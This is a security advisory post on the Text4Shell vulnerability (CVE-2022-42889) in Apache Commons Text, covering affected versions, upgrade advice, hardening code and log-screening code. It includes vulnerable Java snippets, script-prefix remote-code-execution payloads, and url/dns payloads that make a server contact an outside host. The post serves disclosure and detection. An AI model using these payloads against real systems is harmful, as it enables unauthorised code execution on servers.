CVE-2022-42889: Text4Shell, Critical Vulnerability in Apache Commons Text
As happened in December last year with Log4Shell, the vulnerability that affected a multitude of Java products that made use of the Log4J library, a new alert has arisen for the vulnerability that is now known as Text4Shell. This vulnerability (CVE-2022-42889) also affects Java products that make use of a specific functionality of the Apache Commons Text library, and could allow a remote attacker to execute arbitrary code on a server.
The Apache Commons Text library is an alternative to the native Java JDK functionality for processing text strings, focused on specific algorithms for managing this type of data. Its available methods allow interpolation through prefixes, variables and template marks.
Despite the high CVSS score assigned to this vulnerability, it should be noted that the use of the vulnerable component of the Apache Commons Text library is unusual in the processing of untrusted user-controlled inputs. This situation means that the probability of exploitation is quite low compared to Log4Shell.
This issue was identified and reported to the Apache security team on 03/09/2022 by Álvaro Muñoz and was fixed in version 1.10.0, published on 09/24/2022, without any advisory content related to the correction of CVE-2022-42889 or changes related to this security issue.
It was not until October 13 that it was announced on the Apache developer list.
The commit that solves this issue is referenced below:
https://github.com/apache/commons-text/commit/b9b40b903e2d1f9935039803c9852439576780ea
This vulnerability is similar to CVE-2022-33980, which also allowed the interpolation of some strings but in the Apache Commons Configuration library:
https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s
CVE-2022-42889: Key Features
The main characteristics of this vulnerability are detailed below:
- Bug identifier: CVE-2022-42889
- Published date: 13/10/2022
- Affected software: Apache Commons Text
- CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
- Affected versions:
  - 1.5 – 1.9
- Exploitation requirements:
  - The application accepts user-controlled input that is subsequently processed by one of the following methods of the affected component:
    - StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()
    - StringSubstitutor.createInterpolator().replace()
  - Java versions equal to or greater than Java 15 would not be susceptible to remote code execution, since the Nashorn engine is disabled and the “script” prefix would not be available. However, other attacks via the “url” and “dns” prefixes would be possible.
Text4Shell mitigation
The primary solution is to urgently update the Apache Commons Text component to the latest available version that fixes this vulnerability. Specifically, you must upgrade to Apache Commons Text version 1.10.0 or later.
In the 1.10.0 update, the problematic substitutions have been disabled by default. The following details are included in the library’s changelog file:
Make default string lookups configurable via system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled via system property. See StringLookupFactory for details.
A statement with the official information and a reference to the updated version in which the problem is solved has been published on the Apache Commons dev list.
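Beyond upgrading, an application can stop exposing the dangerous lookups entirely by building its interpolator from an explicit allow-list instead of the defaults. The following is an added example, not code from the post or from the Commons Text project; it assumes the public `StringLookupFactory.interpolatorStringLookup(Map, StringLookup, boolean)` API and the `StringSubstitutor(StringLookup)` constructor are available in the affected versions, and the `SafeInterpolator` class and its method names are hypothetical.

```java
// Added example (not from the post): restrict the interpolator to an explicit
// allow-list of lookups so that the script, url and dns prefixes are never
// resolved, whatever Commons Text version is on the classpath.
// Assumption: interpolatorStringLookup(Map, StringLookup, boolean) with
// addDefaultLookups=false exists in the affected 1.5-1.9 releases.
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class SafeInterpolator {

    /** Builds a substitutor that only knows the lookups we explicitly allow. */
    static StringSubstitutor hardenedSubstitutor(Map<String, String> templateValues) {
        StringLookupFactory f = StringLookupFactory.INSTANCE;
        Map<String, StringLookup> allowed = new HashMap<>();
        // Only data the application controls: fixed key/value pairs and date formatting.
        allowed.put("val", f.mapStringLookup(templateValues));
        allowed.put("date", f.dateStringLookup());
        // addDefaultLookups=false: script/url/dns (and the other defaults) are NOT registered,
        // and with no default lookup an unknown prefix simply resolves to null.
        StringLookup restricted = f.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(restricted);
    }

    public static void main(String[] args) {
        Map<String, String> values = new HashMap<>();
        values.put("user", "alice");
        StringSubstitutor safe = hardenedSubstitutor(values);

        // Legitimate template: resolves through the allow-listed "val" lookup.
        System.out.println(safe.replace("Hello ${val:user}"));   // Hello alice

        // Text4Shell-style input (the post's payload): "script" is unknown to this
        // substitutor, so the variable is left unresolved and nothing is executed.
        String hostile = "${script:javascript:java.lang.Runtime.getRuntime().exec(\"touch /tmp/tarlogic\");}";
        System.out.println(safe.replace(hostile));                // echoed back verbatim

        // By contrast, StringSubstitutor.createInterpolator().replace(hostile)
        // on 1.5-1.9 would hand the expression to the Nashorn engine.
    }
}
```

Unresolved variables are echoed back by default; if the application should fail closed instead, enable `setEnableUndefinedVariableException(true)` on the substitutor so unknown prefixes raise an exception rather than leak into output.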
Examples of code vulnerable to CVE-2022-42889
Below are two source code examples that demonstrate the possibility of executing arbitrary code using an affected version of the Apache Commons Text component.
Example 1
```java
import org.apache.commons.text.StringSubstitutor;
// Vulnerable on Commons Text 1.5-1.9: the default interpolator registers the "script" lookup
String poc1 = "${script:javascript:java.lang.Runtime.getRuntime().exec(\"touch /tmp/tarlogic\");}";
String rce1 = StringSubstitutor.createInterpolator().replace(poc1);
```
Example 2
```java
import org.apache.commons.text.lookup.StringLookupFactory;
// Same default lookups reached directly through lookup(); note the payload needs no "${...}" wrapper here
String poc2 = "script:javascript:java.lang.Runtime.getRuntime().exec(\"touch /tmp/tarlogic\")";
String rce2 = StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup(poc2);
```
Detection of Text4Shell CVE-2022-42889 vulnerability – Exploit
On the one hand, as the vulnerable code examples above show, remote code execution could be achieved with payloads like the ones below, which make use of the script prefix:
• ${script:javascript:java.lang.Runtime.getRuntime().exec("touch /tmp/tarlogic");}
• script:javascript:java.lang.Runtime.getRuntime().exec("touch /tmp/tarlogic")
On the other hand, the remote detection of the vulnerability could also be carried out using the url and dns prefixes, verifying that an external server receives an interaction from the affected server that hosts the application. Since the dns prefix was introduced in version 1.8 of Apache Commons Text, detection using the url prefix (present since version 1.5) offers better results.
• ${url:UTF-8:https://server.com}
• ${dns:address|server.com}
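The same prefixes can be used on the defending side: to screen untrusted values before they reach either vulnerable method, and to find attempts in request logs. The following is an added example, not code from the post or the Commons Text project; the `Text4ShellScreen` class, its method names and the sample log lines are constructed for illustration, and it assumes the prefix match is case-insensitive because `InterpolatorStringLookup` lower-cases the prefix before looking it up.

```java
// Added example (not from the post): screens untrusted input for the three prefixes
// the post names (script, url, dns) in both payload shapes, and scans constructed
// request-log lines for the same patterns.
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Text4ShellScreen {
    // "${script:...}" shape consumed by StringSubstitutor.createInterpolator().replace().
    // Assumption: InterpolatorStringLookup lower-cases the prefix before matching, so
    // "${SCRIPT:...}" resolves too and the check must be case-insensitive.
    private static final Pattern EMBEDDED =
        Pattern.compile("\\$\\{(script|url|dns):", Pattern.CASE_INSENSITIVE);
    // Bare "script:..." shape consumed by interpolatorStringLookup().lookup().
    private static final Pattern BARE =
        Pattern.compile("^(script|url|dns):", Pattern.CASE_INSENSITIVE);

    /** True when the value must not be passed to either vulnerable method. */
    static boolean looksLikeText4Shell(String untrusted) {
        return untrusted != null
            && (EMBEDDED.matcher(untrusted).find() || BARE.matcher(untrusted).find());
    }

    /** Lists the dangerous prefixes found in a log line (lower-cased), for triage. */
    static List<String> prefixesIn(String logLine) {
        List<String> hits = new ArrayList<>();
        Matcher m = EMBEDDED.matcher(logLine);
        while (m.find()) {
            hits.add(m.group(1).toLowerCase());
        }
        return hits;
    }

    public static void main(String[] args) {
        String[] log = {  // constructed sample access-log lines, already URL-decoded
            "GET /search?q=widgets HTTP/1.1 200",
            "GET /search?q=${url:UTF-8:https://server.com} HTTP/1.1 200",
            "POST /profile name=${DNS:address|server.com} HTTP/1.1 302"
        };
        for (String line : log) {
            List<String> hits = prefixesIn(line);
            System.out.println((hits.isEmpty() ? "clean   " : "SUSPECT ") + hits + " " + line);
        }
        System.out.println(looksLikeText4Shell("script:javascript:1+1"));  // true
    }
}
```

Web servers usually log the request line still URL-encoded (`%24%7B` for `${`), so decode each line before applying the pattern, and treat a hit as a signal to check which Commons Text version the application ships rather than as proof of compromise.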
As part of Tarlogic's Emerging Vulnerabilities service, we proactively monitor our customers' perimeters to urgently detect, report and notify the presence of this vulnerability, as well as other new critical threats that could have a serious impact on the security of your assets.
CVE-2022-42889 vulnerability references in Apache Text Commons
• https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
• https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
• https://commons.apache.org/proper/commons-text/userguide.html
• https://nvd.nist.gov/vuln/detail/CVE-2022-42889
• https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om